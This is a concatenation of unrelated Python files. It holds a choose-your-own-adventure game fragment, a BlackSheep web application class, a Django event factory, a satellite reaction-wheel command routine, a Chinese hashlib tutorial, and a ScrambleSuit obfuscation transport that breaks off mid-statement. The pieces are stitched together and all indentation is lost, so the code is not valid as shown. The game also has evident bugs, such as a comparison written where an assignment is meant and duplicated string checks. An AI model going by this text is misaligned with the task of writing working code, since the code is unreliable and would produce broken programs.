if arc1dec2 == "HIDE" or arc1dec2 == "Hide" or arc1dec2 == "hide":
print("""You hide under the bed. You hear the sound of something banging against the door and then all of a sudden
it slams wide open! A scarred man stumbles inside falling down at eye level to you and looks up. He sees you.""")
ending2()
elif arc1dec2 == "READ" or arc1dec2 == "Read" or arc1dec2 == "read":
print("You try and read the book at the table, but the light inside is almost nonexistent and you can hardly see the words")
print("You sit quietly at the desk, waiting, and hardly breathing. You hear nothing but the echoing silence around you. The")
print(" very trees outside have gone silent. Your heart thumps in your chest growing louder and louder. You have to do something!")
arc1dec3 = input("Do you OPEN the door, BARRACADE the door, or try to start a FIRE?")
if arc1dec3 == "OPEN" or arc1dec3 == "Open" or arc1dec3 == "open":
print("The overwhelming curiosity takes control of you and you have to know whats outside.")
print("You open the door to see a man standing in front of the door. Your last thought is ")
time.sleep(2)
print("its so cold\n\n\n\n")
ending2()
elif arc1dec3 == "BARRACADE" or arc1dec3 == "Barracade" or arc1dec3 == "barracade":
print("You barracade the door with the desk and chair. Just as you do a large pounding shakes the shack violently.")
print('"Let me in!" a loud voice shouts from the other side. You frantically reach into your pocket to call for help.')
print("As you dial 911 into your phone the table bounces off the door with the shock of the door swinging open.")
print("You scream and back into the shack. A large man stumbles forward into the shack, off balance from the door suddenly")
print(" opening. You race out of the shack, running as fast as you can away from the shack and the man.")
ending1()
elif arc1dec3 == "FIRE" or arc1dec3 == "Fire" or arc1dec3 == "fire":
print("You break the chair up and push the pieces into the fireplace on the side of the shack. The cobwebs")
print(" make excellent kindling to start the fire with your trusty lighter. As the light begins to enter the shack")
print(" you look at the book laying on the table and read.")
print(" Journal")
print("On the front cover. You thumb through the pages reading about a man who lost his mother and father when he was a child")
print(" and how he never forgave them for abandoning him. The man was the reason they died and it left him scarred and unable his new")
print(" reality. He was driven mad with rage and hatred. Blaming everyone else for their death, he vowed to get his revenge.\n")
print(" As you finish reading the journal, the door slams open. A scarred man stands in the doorway.")
ending2()
else:
print("Indecision is punishable. Mistakes are costly. You get to try again this time but you might not always be lucky.")
arc1()
else:
print("Indecision is punishable. Mistakes are costly. An intruder breaks through the door and this is the end for you.")
elif arc1dec == "RUN" or arc1dec == "Run" or arc1dec == "run":
print ("You take off running away from the shack and the noise you heard. The sound of your footsteps crunching")
print (" against the leaves sends chills down your spine. The howling you heard earlier gets louder and you recognise it for")
print("What it is. Someone screaming in the night. Begging for help. ")
dec4 = input("Do you HELP or HIDE or RUN?")
if dec4 == "HELP" or dec4 == "Help" or dec4 == "help":
print("You turn and search for the source of the noise. You rush towards it, but loose your footing and fall, twisting your ankle.")
print(" As you cry out in pain, a dark figure walks out from behind a tree. Its a scarred man.")
print(" You don't say a word. Just watch, frozen in terror as he walks towards you.\n\n\n\n")
ending2()
elif dec4 == "HIDE" or dec4 == "Hide" or dec4 == "hide":
print("You hide behind a tree. As you hide there you see a scarred man walking. He stops and cries out for help.")
print("You stop and hold your breath wondering if he sees you. ")
dec5 = input("Do you RUN or HIDE?")
if dec5 == "RUN" or dec5 == "Run" or dec5 == "run":
print("You run thinking you were spotted. The man sees you run and chases after you. But he's quicker.")
ending2()
if dec5 == "HIDE" or dec5 == "Hide" or dec5 == "hide":
print("You stay silent and don't move. The man stays still and appears to be listening. After a few moments he")
print("Continues walking. After a hundred feet or so he cries out for help again. You continue watching him for")
print(" a few minutes til he goes out of sight. Then you quietly run the other way, towards saftey.")
ending1()
elif dec4 == "RUN" or dec4 == "Run" or dec4 == "run":
print("You keep running. You can hear the pounding of someone elses footsteps behind you but it is faint")
print(" and getting quieter the farther you go. You look over your shoulder and see a scarred man stop chasing you and turn around.")
print("But All you care about though is how far you can go. You keep running for what feel like hours until you come across a road.")
print(" You follow the road and see a town in the distance. As you get closer, you hear the rumbling of a truck behind you. ")
print("You feel a sense of relief until you see the driver. Its the same man that was chasing you. ")
ending2()
else:
print("Try again.")
arc1()
elif decision == "IDK":
print("Wrong answer. You die.")
else:
print("Try again.")
arc1()
def arc2():
print("The sun is bright and everything is right! You are walking with your....")
companion = input("MOM DAD FRIEND")
if companion == "MOM" or companion == "Mom" or companion == "mom":
print("You are with your mom. While walking on the neighborhood street you come upon an ice cream truck")
print('Overcome by memories of your childhood, you ask your mom one more time for a ')
x = input("SPIDERMAN popscicle or a CHOCO taco?")
if x == "SPIDERMAN" or x == "Spiderman" or x == "spiderman":
print("You get a Spiderman popscicle, the one with the lemon and strawberry ice cream and bubble gum eyes.")
print("Life is going simple and great. The sun feels nice out as you eat your ice cream while walking with your mother.")
elif x == "CHOCO" or x == "Choco" or x == "choco":
print("""Popsaicles jusat aren't for you anymore. You've progressed onto the finer things of life and want to enjoy
that delectable choco taco. Life is going good and you are on top of the world. As you are walking you see a large dog
in the road. Do you PET him or WALK away? """)
y = input("PET or WALK")
if y == "PET" or y == "Pet" or y == "pet":
print("""You aproach slowly and stick your hand out for him to smell. He sniffs you curiously and nudges closer
and you start petting him. Ice cream and a dog... doesn't get much better. """)
else:
print(""" You keep walking and the dog continues on his way. You don't want to risk it, dogs can be scary even if
they do look like clifford. """)
if companion == "DAD" or companion == "Dad" or companion == "dad":
print("""You are with your dad. As you are walking he is telling a story about a time you both went ice fishing that you've heard
a million times. do you not say anything and LISTEN or CHANGE the topic? """)
z = input("LISTEN or CHANGE the topic?")
if z == "LISTEN" or z == "Listen" or z == "listen":
print(""" You continue listening patiently as he continues his story. You don't get to see him often anymore and its
nice to hear him so excited. After he finishes his recounting he reaches out and hugs you. He appreciates you listening
and tells you that he knows you've heard it a million times. You feel closer than ever before with your dad. """)
else:
print(""" You interrupt him and tell him that you've heard that story a million times. He looks sad but agrees. You feel
guilty for interuppting him when he was getting so excited and suggest you try and find a time to go out and find a new
spot around your college town that you could go fishing. He perks up at this and you both begin planning it out.""" )
if companion == "FRIEND" or companion == "Friend" or companion == "Friend":
print("""You are with your friend. You're walking down the road after getting lunch at the local taco bellery and hear another friend
call out from a car. "Hey do you guys want a ride?" do you RIDE or WALK """)
a == input("RIDE or WALK")
if a == "RIDE" or a == "Ride" or a == "ride":
print(""" You yell out "Sure!" and hop in their car. Theres only one seat open so your friend has to keep walking. You ride
home and as you get dropped off at your apartment you get a call from your friend and he seems frustrated. You tell him you're sorry
but you didn't want to walk anymore. To make up for it you do all the dishes and take out the trash while you wait. """)
else:
print(""" "I'm good, we'll walk!" you yell to the friend in the car. As you continue walking your friend tells you thanks, he only saw
one seat open in his car. As you walk you talk about all the stuff that is going on and how excited you are about an upcoming event
that you didn't think anyone there knew about. You find out that your friend is also interested in it and make plans to get tickets for it!""")
def arc3():
print("Lucky you, Sometimes life is simple. Heres a few short stories and you decide how they end!")
print("Once a 5 year old boy was standing in shallow water.")
x = input("Next line? HAPPY SAD TWIST\n")
if x == "HAPPY" or x == "Happy" or x == "happy":
print("His mother splashed him as they played in the pool")
ss2()
elif x == "SAD" or x == "Sad" or x == "sad":
print("He looked out to the lake, watching as the waves took his ball away")
ss2()
elif x== "TWIST" or x== "TWIST" or x== "TWIST":
print('He kept repeating the same sentance to the waves. "I can never forgive you for taking away my parents" ')
ss2()
else:
ending3()
def ss2():
print("Everyone goes with the flow… but the one who goes against it becomes someone remarkable.")
x = input("Next line? HAPPY SAD TWIST\n")
if x == "HAPPY" or x == "Happy" or x == "happy":
print("She thought as she prepared for her award acceptance speech.")
ss3()
elif x == "SAD" or x == "Sad" or x == "sad":
print("He thought wishing his ball could go against the flow of the river")
ss3()
elif x== "TWIST" or x== "TWIST" or x== "TWIST":
print('Before I could explain this to the traffic police, the man issued me a ticket')
ss3()
else:
ending3()
def ss3():
print(" The little kid had to stay in jail for quite some time, only to see his home stolen after his release.")
x = input("Next line? HAPPY SAD TWIST\n")
if x == "HAPPY" or x == "Happy" or x == "happy":
print('"You are so dramatic" his mother said after letting him out of time out and seeing his fort knocked over')
elif x == "SAD" or x == "Sad" or x == "sad":
print("The bank took everything when he couldn't pay back his debts.")
elif x== "TWIST" or x== "TWIST" or x== "TWIST":
print('The Monopoly board game got a little tricky at times')
else:
ending3()
def ending1():
print("Whew! you made it! want to try again?")
x = input("Y/N?\n")
if x == "Y" or x == "y":
yourstory()
def ending2():
print("Well that was an untimely ending for you! Want to try and live this time?")
x = input("Y/N?\n")
if x == "Y" or x == "y":
arc1()
def ending3():
print("So in the end you give up. How predictable. Maybe if you try again things will turn out differently? ")
end = input("Y/N?\n")
if end == "Y" or end == "y":
if storytime2 > 80:
arc1()
elif storytime2 > 40:
arc2()
else:
arc3()
else:
print("Thanks for playing!")
def yourstory():
x = input("Would you like to choose your story or go random? CHOOSE or RANDOM\n")
if x == "CHOOSE" or x == "Choose" or x == "choose":
print("1. Scary, 2. Happy, 3. Short")
y = input("1 or 2 or 3?\n")
if y == "1":
arc1()
elif y == "2":
arc2()
elif y == "3":
arc3()
else:
print("Try again")
yourstory()
else:
whichstory()
def whichstory():
if storytime > 80:
arc1()
elif storytime > 40:
arc2()
else:
arc3()
#Starting point
print (storytime)
intro() |
import logging
from typing import (
Any,
Awaitable,
Callable,
List,
Optional,
Tuple,
Type,
Sequence,
)
from guardpost.asynchronous.authentication import AuthenticationStrategy
from guardpost.asynchronous.authorization import AuthorizationStrategy
from guardpost.authorization import Policy, UnauthorizedError
from rodi import Container, Services
from blacksheep.baseapp import BaseApplication
from blacksheep.common.files.asyncfs import FilesHandler
from blacksheep.contents import ASGIContent
from blacksheep.messages import Request, Response
from blacksheep.middlewares import get_middlewares_chain
from blacksheep.scribe import send_asgi_response
from blacksheep.server.authentication import (
AuthenticateChallenge,
get_authentication_middleware,
handle_authentication_challenge,
)
from blacksheep.server.authorization import (
AuthorizationWithoutAuthenticationError,
get_authorization_middleware,
handle_unauthorized,
)
from blacksheep.server.bindings import ControllerParameter
from blacksheep.server.controllers import router as controllers_router
from blacksheep.server.files.dynamic import ServeFilesOptions, serve_files_dynamic
from blacksheep.server.normalization import normalize_handler, normalize_middleware
from blacksheep.server.resources import get_resource_file_content
from blacksheep.server.routing import RegisteredRoute, Router, RoutesRegistry
from blacksheep.utils import ensure_bytes, join_fragments
__all__ = ("Application",)
def get_default_headers_middleware(
headers: Sequence[Tuple[str, str]],
) -> Callable[..., Awaitable[Response]]:
raw_headers = tuple((name.encode(), value.encode()) for name, value in headers)
async def default_headers_middleware(
request: Request, handler: Callable[[Request], Awaitable[Response]]
) -> Response:
response = await handler(request)
for name, value in raw_headers:
response.add_header(name, value)
return response
return default_headers_middleware
class Resources:
def __init__(self, error_page_html: str):
self.error_page_html = error_page_html
class ApplicationEvent:
def __init__(self, context: Any) -> None:
self.__handlers: List[Callable[..., Any]] = []
self.context = context
def __iadd__(self, handler: Callable[..., Any]) -> "ApplicationEvent":
self.__handlers.append(handler)
return self
def __isub__(self, handler: Callable[..., Any]) -> "ApplicationEvent":
self.__handlers.remove(handler)
return self
def __len__(self) -> int:
return len(self.__handlers)
async def fire(self, *args: Any, **keywargs: Any) -> None:
for handler in self.__handlers:
await handler(self.context, *args, **keywargs)
class ApplicationStartupError(RuntimeError):
...
class RequiresServiceContainerError(ApplicationStartupError):
def __init__(self, details: str):
super().__init__(
f"The application requires services to be a Container "
f"at this point of execution. Details: {details}"
)
self.details = details
class Application(BaseApplication):
def __init__(
self,
*,
router: Optional[Router] = None,
resources: Optional[Resources] = None,
services: Optional[Container] = None,
debug: bool = False,
show_error_details: bool = False,
):
if router is None:
router = Router()
if services is None:
services = Container()
super().__init__(show_error_details, router)
if resources is None:
resources = Resources(get_resource_file_content("error.html"))
self.services: Container = services
self._service_provider: Optional[Services] = None
self.debug = debug
self.middlewares: List[Callable[..., Awaitable[Response]]] = []
self.access_logger = None
self.logger = None
self._default_headers: Optional[Tuple[Tuple[str, str], ...]] = None
self._middlewares_configured = False
self.resources = resources
self._authentication_strategy: Optional[AuthenticationStrategy] = None
self._authorization_strategy: Optional[AuthorizationStrategy] = None
self.on_start = ApplicationEvent(self)
self.after_start = ApplicationEvent(self)
self.on_stop = ApplicationEvent(self)
self.started = False
self.controllers_router: RoutesRegistry = controllers_router
self.files_handler = FilesHandler()
@property
def service_provider(self) -> Services:
"""
Returns the object that provides services of this application.
"""
if self._service_provider is None:
raise TypeError("The service provider is not build for this application.")
return self._service_provider
@property
def default_headers(self) -> Optional[Tuple[Tuple[str, str], ...]]:
return self._default_headers
@default_headers.setter
def default_headers(self, value: Optional[Tuple[Tuple[str, str], ...]]) -> None:
self._default_headers = tuple(value) if value else None
def use_authentication(
self, strategy: Optional[AuthenticationStrategy] = None
) -> AuthenticationStrategy:
if self.started:
raise RuntimeError(
"The application is already running, configure authentication "
"before starting the application"
)
if not strategy:
strategy = AuthenticationStrategy()
self._authentication_strategy = strategy
return strategy
def use_authorization(
self, strategy: Optional[AuthorizationStrategy] = None
) -> AuthorizationStrategy:
if self.started:
raise RuntimeError(
"The application is already running, configure authorization "
"before starting the application"
)
if not strategy:
strategy = AuthorizationStrategy()
if strategy.default_policy is None:
# by default, a default policy is configured with no requirements,
# meaning that request handlers allow anonymous users, unless
# specified otherwise
# this can be modified, by adding a requirement to the default
# policy
strategy.default_policy = Policy("default")
self._authorization_strategy = strategy
self.exceptions_handlers[
AuthenticateChallenge
] = handle_authentication_challenge
self.exceptions_handlers[UnauthorizedError] = handle_unauthorized
return strategy
def route(
self, pattern: str, methods: Optional[Sequence[str]] = None
) -> Callable[..., Any]:
if methods is None:
methods = ["GET"]
def decorator(f):
for method in methods:
self.router.add(method, pattern, f)
return f
return decorator
def serve_files(self, options: ServeFilesOptions):
serve_files_dynamic(self.router, self.files_handler, options)
def _apply_middlewares_in_routes(self):
for route in self.router:
route.handler = get_middlewares_chain(self.middlewares, route.handler)
def _normalize_middlewares(self):
self.middlewares = [
normalize_middleware(middleware, self.service_provider)
for middleware in self.middlewares
]
def use_controllers(self):
# NB: controller types are collected here, and not with
# Controller.__subclasses__(),
# to avoid funny bugs in case several Application objects are defined
# with different controllers; this is the case for example of tests.
# This sophisticated approach, using metaclassing, dynamic
# attributes, and calling handlers dynamically
# with activated instances of controllers; still supports custom
# and generic decorators (*args, **kwargs);
# as long as `functools.wraps` decorator is used in those decorators.
self.register_controllers(self.prepare_controllers())
def get_controller_handler_pattern(
self, controller_type: Type, route: RegisteredRoute
) -> bytes:
"""
Returns the full pattern to be used for a route handler,
defined as controller method.
"""
base_route = getattr(controller_type, "route", None)
if base_route is not None:
if callable(base_route):
value = base_route()
elif isinstance(base_route, (str, bytes)):
value = base_route
else:
raise RuntimeError(
f"Invalid controller `route` attribute. "
f"Controller `{controller_type.__name__}` "
f"has an invalid route attribute: it should "
f"be callable, or str, or bytes."
)
if value:
return ensure_bytes(join_fragments(value, route.pattern))
return ensure_bytes(route.pattern)
def prepare_controllers(self) -> List[Type]:
controller_types = []
for route in self.controllers_router:
handler = route.handler
controller_type = getattr(handler, "controller_type")
controller_types.append(controller_type)
handler.__annotations__["self"] = ControllerParameter[controller_type]
self.router.add(
route.method,
self.get_controller_handler_pattern(controller_type, route),
handler,
)
return controller_types
def bind_controller_type(self, controller_type: Type):
templates_environment = getattr(self, "templates_environment", None)
if templates_environment:
setattr(controller_type, "templates", templates_environment)
def register_controllers(self, controller_types: List[Type]):
"""
Registers controller types as transient services
in the application service container.
"""
if not controller_types:
return
if not isinstance(self.services, Container):
raise RequiresServiceContainerError(
"When using controllers, the application.services must be "
"a service `Container` (`rodi.Container`; not a built service "
"provider)."
)
for controller_class in controller_types:
if controller_class in self.services:
continue
self.bind_controller_type(controller_class)
# TODO: maybe rodi should be modified to handle the following
# internally;
# if a type does not define an __init__ method, then a fair
# assumption is that it can be instantiated
# by calling it;
# TODO: the following if statement can be removed if rodi is
# modified as described above.
if getattr(controller_class, "__init__") is object.__init__:
self.services.add_transient_by_factory(
controller_class, controller_class
)
else:
self.services.add_exact_transient(controller_class)
def normalize_handlers(self):
configured_handlers = set()
self.router.sort_routes()
for route in self.router:
if route.handler in configured_handlers:
continue
route.handler = normalize_handler(route, self.service_provider)
configured_handlers.add(route.handler)
configured_handlers.clear()
def configure_middlewares(self):
if self._middlewares_configured:
return
self._middlewares_configured = True
if self._authorization_strategy:
if not self._authentication_strategy:
raise AuthorizationWithoutAuthenticationError()
self.middlewares.insert(
0, get_authorization_middleware(self._authorization_strategy)
)
if self._authentication_strategy:
self.middlewares.insert(
0, get_authentication_middleware(self._authentication_strategy)
)
if self._default_headers:
self.middlewares.insert(
0, get_default_headers_middleware(self._default_headers)
)
self._normalize_middlewares()
if self.middlewares:
self._apply_middlewares_in_routes()
def build_services(self):
self._service_provider = self.services.build_provider()
async def start(self):
if self.started:
return
self.started = True
if self.on_start:
await self.on_start.fire()
self.use_controllers()
self.build_services()
self.normalize_handlers()
self.configure_middlewares()
if self.after_start:
await self.after_start.fire()
async def stop(self):
await self.on_stop.fire()
self.started = False
async def _handle_lifespan(self, receive, send):
message = await receive()
assert message["type"] == "lifespan.startup"
try:
await self.start()
except: # NOQA
logging.exception("Startup error")
await send({"type": "lifespan.startup.failed"})
return
await send({"type": "lifespan.startup.complete"})
message = await receive()
assert message["type"] == "lifespan.shutdown"
await self.stop()
await send({"type": "lifespan.shutdown.complete"})
async def __call__(self, scope, receive, send):
if scope["type"] == "lifespan":
return await self._handle_lifespan(receive, send)
assert scope["type"] == "http"
request = Request.incoming(
scope["method"], scope["raw_path"], scope["query_string"], scope["headers"]
)
request.scope = scope
request.content = ASGIContent(receive)
response = await self.handle(request)
await send_asgi_response(response, send)
request.scope = None # type: ignore
request.content.dispose()
|
import datetime
import factory
from kawaz.core.personas.tests.factories import PersonaFactory
from ..models import Event
class EventFactory(factory.DjangoModelFactory):
FACTORY_FOR = Event
pub_state = 'public'
title = '焼肉食べまくる会'
period_start = factory.LazyAttribute(lambda o: datetime.datetime.now() + datetime.timedelta(hours=1))
period_end = factory.LazyAttribute(lambda o: datetime.datetime.now() + datetime.timedelta(hours=4))
place = 'すすきの周辺'
organizer = factory.SubFactory(PersonaFactory)
|
from Util.LoggingHelper import log_info_message
from datetime import datetime
async def get_reaction_wheel_status(rf_controller):
try:
log_info_message('Sending Get Reaction Wheel Command')
await rf_controller.send(7)
while True:
print('Waiting for response...')
receive = await rf_controller.get_response(10)
if receive == 71:
print('Reaction Wheels are Running')
break
elif receive == 70:
print('Reaction Wheels are not running')
break
else:
print('Timed out - Retrying')
await rf_controller.send(5200)
except Exception as e:
print('Error: ' + str(e)) |
"""
不可逆加密
hashlib模块简介:
hashlib模块为不同的安全哈希/安全散列(Secure Hash Algorithm)和 信息摘要算法(Message Digest Algorithm)
实现了一个公共的、通用的接口,也可以说是一个统一的入口。
因为hashlib模块不仅仅是整合了md5和sha模块的功能,
还提供了对更多中算法的函数实现,
如:MD5,SHA1,SHA224,SHA256,SHA384和SHA512。
hashlib模块使用步骤:
1)获取一个哈希算法对应的哈希对象(比如名称为hash):
可以通过 hashlib.new(哈希算法名称, 初始出入信息)函数,来获取这个哈希对象,
如hashlib.new('MD5', 'Hello'),hashlib.new('SHA1', 'Hello')等;
也可以通过hashlib.哈希算法名称()来获取这个哈希对象,
如hashlib.md5(), hashlib.sha1()等。
2)设置/追加输入信息:
调用已得到哈希对象的update(输入信息)方法可以设置或追加输入信息,
多次调用该方法,等价于把每次传递的参数凭借后进行作为一个参数垫底给update()方法。
也就是说,多次调用是累加,而不是覆盖。
3)获取输入信息对应的摘要:
调用已得到的哈希对象的digest()方法或hexdigest()方法即可得到传递给update()方法的字符串参数的摘要信息。
digest()方法返回的摘要信息是一个二进制格式的字符串,
其中可能包含非ASCII字符,包括NUL字节,该字符串长度可以通过哈希对象的digest_size属性获取;
而hexdigest()方法返回的摘要信息是一个16进制格式的字符串,
该字符串中只包含16进制的数字,且长度是digest()返回结果长度的2倍,
这可用邮件的安全交互或其它非二进制的环境中。
"""
#!/usr/bin/env python
# coding=utf-8
__author__ = 'Luzhuo'
__date__ = '2017/5/19'
# hash_demo.py Hash加密相关(安全哈希)
# 支持: MD5, SHA1 SHA224 SHA256 SHA384 SHA512
import hashlib
def hash_demo():
m = hashlib.md5()
m.update(b"hello")
m.update(b"world!") # = hello + world!
hash_hex = hashlib.sha3_512(b"luzhuo.me").hexdigest()
print(m.digest_size)
print(m.digest()) # 二进制hash
print(m.hexdigest()) # 十六进制hash
print(hash_hex)
# 加盐加密
hash_bytes = hashlib.pbkdf2_hmac('sha256', b'luzhuo.me', b'80', 100000)
print(hash_bytes)
def hash_func():
# hashlib.new(name[, data]) // 创建hashlib(非首选), name=算法名, data:数据
hash = hashlib.new('ripemd160', b'luzhuo.me')
# 常量
dics = hashlib.algorithms_guaranteed # 所有平台支持的hash算法的名称
dics = hashlib.algorithms_available # 在Python解析器中可用的hash算法的名称, 传递给new()时, 可识别
# hashlib.pbkdf2_hmac(hash_name, password, salt, iterations, dklen=None) // 加盐加密 hash_name:hash名称, password:数据, salt:盐, iterations:循环次数, dklen:密钥长度
hash_bytes = hashlib.pbkdf2_hmac('sha256', b'luzhuo.me', b'80', 100000)
# hash对象
num = hash.digest_size # hash结果的大小
num = hash.block_size # hash算法的内部块的大小
strs = hash.name # hash名称, 可传给new()使用
hash.update(b"data") # 字节缓冲区 hash.update(a) hash.update(b) == hash.update(a+b)
hash_bytes = hash.digest() # 字节hash
hash_str = hash.hexdigest() # 16进制字符串hash
hash = hash.copy() # 拷贝hash对象副本
if __name__ == "__main__":
hash_demo()
# hash_func()
|
"""
The scramblesuit module implements the ScrambleSuit obfuscation protocol.
The paper discussing the design and evaluation of the ScrambleSuit pluggable
transport protocol is available here:
http://www.cs.kau.se/philwint/scramblesuit/
"""
from twisted.internet import reactor
import obfsproxy.transports.base as base
import obfsproxy.common.log as logging
import random
import base64
import yaml
import probdist
import mycrypto
import message
import const
import util
import packetmorpher
import ticket
import uniformdh
import state
import fifobuf
log = logging.get_obfslogger()
class ScrambleSuitTransport( base.BaseTransport ):
"""
Implement the ScrambleSuit protocol.
The class implements methods which implement the ScrambleSuit protocol. A
large part of the protocol's functionality is outsources to different
modules.
"""
def __init__( self ):
"""
Initialise a ScrambleSuitTransport object.
"""
log.error("\n\n################################################\n"
"Do NOT rely on ScrambleSuit for strong security!\n"
"################################################\n")
log.debug("Initialising %s." % const.TRANSPORT_NAME)
super(ScrambleSuitTransport, self).__init__()
# Load the server's persistent state from file.
if self.weAreServer:
self.srvState = state.load()
# Initialise the protocol's state machine.
log.debug("Switching to state ST_WAIT_FOR_AUTH.")
self.protoState = const.ST_WAIT_FOR_AUTH
# Buffer for outgoing data.
self.sendBuf = ""
# Buffer for inter-arrival time obfuscation.
self.choppingBuf = fifobuf.Buffer()
# AES instances to decrypt incoming and encrypt outgoing data.
self.sendCrypter = mycrypto.PayloadCrypter()
self.recvCrypter = mycrypto.PayloadCrypter()
# Packet morpher to modify the protocol's packet length distribution.
self.pktMorpher = packetmorpher.new(self.srvState.pktDist
if self.weAreServer else None)
# Inter-arrival time morpher to obfuscate inter arrival times.
self.iatMorpher = self.srvState.iatDist if self.weAreServer else \
probdist.new(lambda: random.random() %
const.MAX_PACKET_DELAY)
# Used to extract protocol messages from encrypted data.
self.protoMsg = message.MessageExtractor()
# Used by the server-side: `True' if the ticket is already
# decrypted but not yet authenticated.
self.decryptedTicket = False
# If we are in external mode we should already have a shared
# secret set up because of validate_external_mode_cli().
if self.weAreExternal:
assert(self.uniformDHSecret)
if self.weAreClient and not self.weAreExternal:
# As a client in managed mode, we get the shared secret
# from callback `handle_socks_args()' per-connection. Set
# the shared secret to None for now.
self.uniformDHSecret = None
self.uniformdh = uniformdh.new(self.uniformDHSecret, self.weAreServer)
@classmethod
def setup( cls, transportConfig ):
"""
Called once when obfsproxy starts.
"""
util.setStateLocation(transportConfig.getStateLocation())
cls.weAreClient = transportConfig.weAreClient
cls.weAreServer = not cls.weAreClient
cls.weAreExternal = transportConfig.weAreExternal
# If we are server and in managed mode, we should get the
# shared secret from the server transport options.
if cls.weAreServer and not cls.weAreExternal:
cfg = transportConfig.getServerTransportOptions()
if cfg and "password" in cfg:
cls.uniformDHSecret = base64.b32decode(util.sanitiseBase32(
cfg["password"]))
cls.uniformDHSecret = cls.uniformDHSecret.strip()
@classmethod
def get_public_server_options( cls, transportOptions ):
"""
Return ScrambleSuit's BridgeDB parameters, i.e., the shared secret.
As a fallback mechanism, we return an automatically generated password
if the bridge operator did not use `ServerTransportOptions'.
"""
log.debug("Tor's transport options: %s" % str(transportOptions))
if not "password" in transportOptions:
log.warning("No password found in transport options (use Tor's " \
"`ServerTransportOptions' to set your own password)." \
" Using automatically generated password instead.")
srv = state.load()
transportOptions = {"password":
base64.b32encode(srv.fallbackPassword)}
cls.uniformDHSecret = srv.fallbackPassword
return transportOptions
def deriveSecrets( self, masterKey ):
"""
Derive various session keys from the given `masterKey'.
The argument `masterKey' is used to derive two session keys and nonces
for AES-CTR and two HMAC keys. The derivation is done using
HKDF-SHA256.
"""
assert len(masterKey) == const.MASTER_KEY_LENGTH
log.debug("Deriving session keys from %d-byte master key." %
len(masterKey))
# We need key material for two symmetric AES-CTR keys, nonces and
# HMACs. In total, this equals 144 bytes of key material.
hkdf = mycrypto.HKDF_SHA256(masterKey, "", (32 * 4) + (8 * 2))
okm = hkdf.expand()
assert len(okm) >= ((32 * 4) + (8 * 2))
# Set AES-CTR keys and nonces for our two AES instances.
self.sendCrypter.setSessionKey(okm[0:32], okm[32:40])
self.recvCrypter.setSessionKey(okm[40:72], okm[72:80])
# Set the keys for the two HMACs protecting our data integrity.
self.sendHMAC = okm[80:112]
self.recvHMAC = okm[112:144]
if self.weAreServer:
self.sendHMAC, self.recvHMAC = self.recvHMAC, self.sendHMAC
self.sendCrypter, self.recvCrypter = self.recvCrypter, \
self.sendCrypter
def circuitConnected( self ):
"""
Initiate a ScrambleSuit handshake.
This method is only relevant for clients since servers never initiate
handshakes. If a session ticket is available, it is redeemed.
Otherwise, a UniformDH handshake is conducted.
"""
# The server handles the handshake passively.
if self.weAreServer:
return
# The preferred authentication mechanism is a session ticket.
bridge = self.circuit.downstream.transport.getPeer()
storedTicket = ticket.findStoredTicket(bridge)
if storedTicket is not None:
log.debug("Redeeming stored session ticket.")
(masterKey, rawTicket) = storedTicket
self.deriveSecrets(masterKey)
self.circuit.downstream.write(ticket.createTicketMessage(rawTicket,
self.sendHMAC))
# We switch to ST_CONNECTED opportunistically since we don't know
# yet whether the server accepted the ticket.
log.debug("Switching to state ST_CONNECTED.")
self.protoState = const.ST_CONNECTED
self.flushSendBuffer()
# Conduct an authenticated UniformDH handshake if there's no ticket.
else:
log.debug("No session ticket to redeem. Running UniformDH.")
self.circuit.downstream.write(self.uniformdh.createHandshake())
def sendRemote( self, data, flags=const.FLAG_PAYLOAD ):
"""
Send data to the remote end after a connection was established.
The given `data' is first encapsulated in protocol messages. Then, the
protocol message(s) are sent over the wire. The argument `flags'
specifies the protocol message flags with the default flags signalling
payload.
"""
log.debug("Processing %d bytes of outgoing data." % len(data))
# Wrap the application's data in ScrambleSuit protocol messages.
messages = message.createProtocolMessages(data, flags=flags)
# Let the packet morpher tell us how much we should pad.
paddingLen = self.pktMorpher.calcPadding(sum([len(msg) for
msg in messages]))
# If padding > header length, a single message will do...
if paddingLen > const.HDR_LENGTH:
messages.append(message.new("", paddingLen=paddingLen -
const.HDR_LENGTH))
# ...otherwise, we use two padding-only messages.
else:
messages.append(message.new("", paddingLen=const.MPU -
const.HDR_LENGTH))
messages.append(message.new("", paddingLen=paddingLen))
blurb = "".join([msg.encryptAndHMAC(self.sendCrypter,
self.sendHMAC) for msg in messages])
# Flush data chunk for chunk to obfuscate inter arrival times.
if const.USE_IAT_OBFUSCATION:
if len(self.choppingBuf) == 0:
self.choppingBuf.write(blurb)
reactor.callLater(self.iatMorpher.randomSample(),
self.flushPieces)
else:
# flushPieces() is still busy processing the chopping buffer.
self.choppingBuf.write(blurb)
else:
self.circuit.downstream.write(blurb)
def flushPieces( self ):
"""
Write the application data in chunks to the wire.
The cached data is sent over the wire in chunks. After every write
call, control is given back to the Twisted reactor so it has a chance
to flush the data. Shortly thereafter, this function is called again
to write the next chunk of data. The delays in between subsequent
write calls are controlled by the inter-arrival time obfuscator.
"""
# Drain and send an MTU-sized chunk from the chopping buffer.
if len(self.choppingBuf) > const.MTU:
self.circuit.downstream.write(self.choppingBuf.read(const.MTU))
# Drain and send whatever is left in the output buffer.
else:
self.circuit.downstream.write(self.choppingBuf.read())
return
reactor.callLater(self.iatMorpher.randomSample(), self.flushPieces)
def processMessages( self, data ):
"""
Acts on extracted protocol messages based on header flags.
After the incoming `data' is decrypted and authenticated, this method
processes the received data based on the header flags. Payload is
written to the local application, new tickets are stored, or keys are
added to the replay table.
"""
if (data is None) or (len(data) == 0):
return
# Try to extract protocol messages from the encrypted blurb.
msgs = self.protoMsg.extract(data, self.recvCrypter, self.recvHMAC)
if (msgs is None) or (len(msgs) == 0):
return
for msg in msgs:
# Forward data to the application.
if msg.flags == const.FLAG_PAYLOAD:
self.circuit.upstream.write(msg.payload)
# Store newly received ticket.
elif self.weAreClient and (msg.flags == const.FLAG_NEW_TICKET):
assert len(msg.payload) == (const.TICKET_LENGTH +
const.MASTER_KEY_LENGTH)
peer = self.circuit.downstream.transport.getPeer()
ticket.storeNewTicket(msg.payload[0:const.MASTER_KEY_LENGTH],
msg.payload[const.MASTER_KEY_LENGTH:
const.MASTER_KEY_LENGTH +
const.TICKET_LENGTH], peer)
# Use the PRNG seed to generate the same probability distributions
# as the server. That's where the polymorphism comes from.
elif self.weAreClient and (msg.flags == const.FLAG_PRNG_SEED):
assert len(msg.payload) == const.PRNG_SEED_LENGTH
log.debug("Obtained PRNG seed.")
prng = random.Random(msg.payload)
pktDist = probdist.new(lambda: prng.randint(const.HDR_LENGTH,
const.MTU),
